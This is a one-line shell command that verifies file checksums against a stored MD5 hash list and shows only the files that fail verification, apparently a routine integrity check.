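md5sum -c /usr/local/file_hashs.txt 2>/dev/null | grep -v ': OK$'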